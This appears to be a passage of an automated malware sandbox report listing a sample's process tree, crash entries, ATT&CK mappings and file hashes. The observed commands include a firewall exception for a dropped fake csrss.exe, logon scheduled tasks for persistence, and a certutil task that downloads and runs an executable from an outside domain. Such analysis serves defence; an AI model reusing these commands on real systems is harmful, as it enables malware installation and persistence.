C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 372
2⤵
- Program crash
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 604
2⤵
- Program crash
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 704
2⤵
- Program crash
PID:2580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 724
2⤵
- Program crash
PID:3296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 724
2⤵
- Program crash
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 748
2⤵
- Program crash
PID:1064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 768
2⤵
- Program crash
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 776
2⤵
- Program crash
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 696
2⤵
- Program crash
PID:3512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 876
2⤵
- Program crash
PID:3484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 616
2⤵
- Program crash
PID:3956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 892
2⤵
- Program crash
PID:3468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 852
2⤵
- Program crash
PID:828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 900
2⤵
- Program crash
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 880
2⤵
- Program crash
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 852
2⤵
- Program crash
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 844
2⤵
- Program crash
PID:2452

C:\Users\Admin\AppData\Local\Temp\8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe
"C:\Users\Admin\AppData\Local\Temp\8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d.exe"
2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 292
3⤵
- Program crash
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 296
3⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 296
3⤵
- Program crash
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 628
3⤵
- Program crash
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 628
3⤵
- Program crash
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 628
3⤵
- Program crash
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 696
3⤵
- Program crash
PID:2888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 692
3⤵
- Program crash
PID:1716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 732
3⤵
- Program crash
PID:2608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 564
3⤵
- Program crash
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 820
3⤵
- Program crash
PID:2208

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:4920

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
PID:4520

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 216
4⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 332
4⤵
- Program crash
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 332
4⤵
- Program crash
PID:2252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 664
4⤵
- Program crash
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 664
4⤵
- Program crash
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 728
4⤵
- Program crash
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 716
4⤵
- Program crash
PID:1584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 760
4⤵
- Program crash
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 792
4⤵
- Program crash
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 808
4⤵
- Program crash
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 820
4⤵
- Program crash
PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 920
4⤵
- Program crash
PID:4404

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4972

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:2424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 960
4⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 976
4⤵
- Program crash
PID:1660

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
PID:2380

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1016
4⤵
- Program crash
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1064
4⤵
- Program crash
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1512
4⤵
- Program crash
PID:116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1528
4⤵
- Program crash
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1528
4⤵
- Program crash
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1496
4⤵
- Program crash
PID:3844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1544
4⤵
- Program crash
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1620
4⤵
- Program crash
PID:2848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1608
4⤵
- Program crash
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1616
4⤵
- Program crash
PID:548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1660
4⤵
- Program crash
PID:748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 1556
4⤵
- Program crash
PID:3124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4852 -ip 4852
1⤵
PID:2728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4852 -ip 4852
1⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4852 -ip 4852
1⤵
PID:4140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4852 -ip 4852
1⤵
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4852 -ip 4852
1⤵
PID:2012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4852 -ip 4852
1⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4852 -ip 4852
1⤵
PID:408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4852 -ip 4852
1⤵
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4852 -ip 4852
1⤵
PID:116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4852 -ip 4852
1⤵
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4852 -ip 4852
1⤵
PID:376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4852 -ip 4852
1⤵
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4852 -ip 4852
1⤵
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4852 -ip 4852
1⤵
PID:1888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4852 -ip 4852
1⤵
PID:2000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4852 -ip 4852
1⤵
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4852 -ip 4852
1⤵
PID:644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4852 -ip 4852
1⤵
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4852 -ip 4852
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2468 -ip 2468
1⤵
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2468 -ip 2468
1⤵
PID:548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2468 -ip 2468
1⤵
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2468 -ip 2468
1⤵
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2468 -ip 2468
1⤵
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2468 -ip 2468
1⤵
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2468 -ip 2468
1⤵
PID:1376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2468 -ip 2468
1⤵
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2468 -ip 2468
1⤵
PID:1928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2468 -ip 2468
1⤵
PID:1380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2468 -ip 2468
1⤵
PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4656 -ip 4656
1⤵
PID:1768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4656 -ip 4656
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4656 -ip 4656
1⤵
PID:5024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4656 -ip 4656
1⤵
PID:1592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4656 -ip 4656
1⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4656 -ip 4656
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4656 -ip 4656
1⤵
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4656 -ip 4656
1⤵
PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4656 -ip 4656
1⤵
PID:1640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4656 -ip 4656
1⤵
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4656 -ip 4656
1⤵
PID:3356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4656 -ip 4656
1⤵
PID:3084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4656 -ip 4656
1⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4656 -ip 4656
1⤵
PID:4140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4656 -ip 4656
1⤵
PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4656 -ip 4656
1⤵
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4656 -ip 4656
1⤵
PID:2912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4656 -ip 4656
1⤵
PID:1160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4656 -ip 4656
1⤵
PID:3468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4656 -ip 4656
1⤵
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4656 -ip 4656
1⤵
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4656 -ip 4656
1⤵
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4656 -ip 4656
1⤵
PID:1368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4656 -ip 4656
1⤵
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4656 -ip 4656
1⤵
PID:1380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4656 -ip 4656
1⤵
PID:5068

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
2abec5db341e67e7d366b614d1f558bd

SHA1
1ec1785639296fd6c0772d1664919ae2e2e10f1b

SHA256
8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d

SHA512
38dffbc65f4622590c2cd169b59e958eedc9f689c456d0bdfb005211868984fc5a966fb25a91cd81954a0751cf3d56216133e9144149628f666ccc1a518da9cc

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
2abec5db341e67e7d366b614d1f558bd

SHA1
1ec1785639296fd6c0772d1664919ae2e2e10f1b

SHA256
8352f0fad44546a0b44da6b543885d35f16f76ac85df086cd5b707d687021c0d

SHA512
38dffbc65f4622590c2cd169b59e958eedc9f689c456d0bdfb005211868984fc5a966fb25a91cd81954a0751cf3d56216133e9144149628f666ccc1a518da9cc

Download Submit
memory/1080-152-0x0000000000000000-mapping.dmp

Download
memory/2380-150-0x0000000000000000-mapping.dmp

Download
memory/2424-149-0x0000000000000000-mapping.dmp

Download
memory/2468-135-0x0000000000000000-mapping.dmp

Download
memory/2468-138-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2468-139-0x00000000012AE000-0x0000000001656000-memory.dmp

Filesize
3.7MB

Download
memory/2468-145-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/4520-141-0x0000000000000000-mapping.dmp

Download
memory/4656-147-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/4656-142-0x0000000000000000-mapping.dmp

Download
memory/4656-146-0x0000000001400000-0x00000000017A8000-memory.dmp

Filesize
3.7MB

Download
memory/4656-153-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/4852-132-0x00000000010D8000-0x0000000001480000-memory.dmp

Filesize
3.7MB

Download
memory/4852-137-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/4852-136-0x0000000001490000-0x0000000001C95000-memory.dmp

Filesize
8.0MB

Download
memory/4852-134-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/4852-133-0x0000000001490000-0x0000000001C95000-memory.dmp

Filesize
8.0MB

Download
memory/4920-140-0x0000000000000000-mapping.dmp

Download
memory/4972-148-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads